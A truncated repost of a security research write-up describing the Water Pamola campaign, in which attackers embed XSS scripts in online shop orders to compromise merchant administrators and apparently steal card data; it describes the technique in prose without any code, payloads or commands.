The above is a screenshot of the text in a forum, which is translated by Google Translate as Problem, there is an order that seems to be a mischievous order. The following characters are included in the address and company name.
The script connects to the Water Pamola’s server and downloads additional payloads. Taken together, this led us to believe that Water Pamola places orders with this embedded XSS script across many targeted online shops. If they are vulnerable to this XSS attack, these will be loaded when the victim (i.e., an administrator at the targeted merchant) opens the order within their management panel.
We have collected many attack scripts they delivered to different targets. The malicious behavior performed by the scripts includes page grabbing, credential phishing, web shell infection, and malware delivery.
This campaign appears to be financially motivated. In at least one instance, a site that Water Pamola attacked later disclosed that they had suffered a data breach. Their server was illegally accessed and personal information, which included names, credit card numbers, card expiration dates, and credit card security codes, were potentially leaked. This breach might be associated with Water Pamola, and it hints that this campaign’s overall goal is to steal the credit card data (similar to Magecart campaigns).
Analysis of the XSS attack
As previously mentioned, Water Pamola sent online shopping orders appended with a malicious XSS script to attack e-commerce administrators.
It’s worth mentioning that they are not targeting a specific e-commerce framework, but e-commerce systems in general. If the ..
Support the originator by clicking the read the rest link below.
